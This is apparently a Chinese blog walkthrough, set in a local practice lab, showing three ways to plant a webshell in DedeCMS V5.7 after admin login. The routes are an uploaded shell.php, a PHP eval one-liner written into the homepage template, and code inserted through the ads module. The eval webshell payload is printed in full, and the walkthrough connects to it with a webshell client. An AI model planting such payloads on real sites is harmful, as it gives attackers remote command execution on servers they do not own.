DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
hjh198291 小时前
复现cacti的RCE
网络·安全·php
一口一个橘子1 小时前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
那个指针是空的?1 小时前
动/静态库的原理及制作
linux·运维·服务器
Sh3r10ck1 小时前
【Hack The Box】Code Write Up
安全
Clain2 小时前
在多机运维过程中,最容易踩的几个坑
linux·运维·服务器
波吉爱睡觉2 小时前
Redis反弹Shell
redis·web安全·网络安全
DARLING Zero two♡2 小时前
【Linux操作系统】简学深悟启示录:Linux环境基础开发工具使用
linux·运维·服务器
new_abc3 小时前
net-snmp添加自定义mib树
服务器·前端·javascript
幻雨様3 小时前
UE5多人MOBA+GAS 30、技能升级机制
运维·服务器·ue5
wha the fuck4043 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php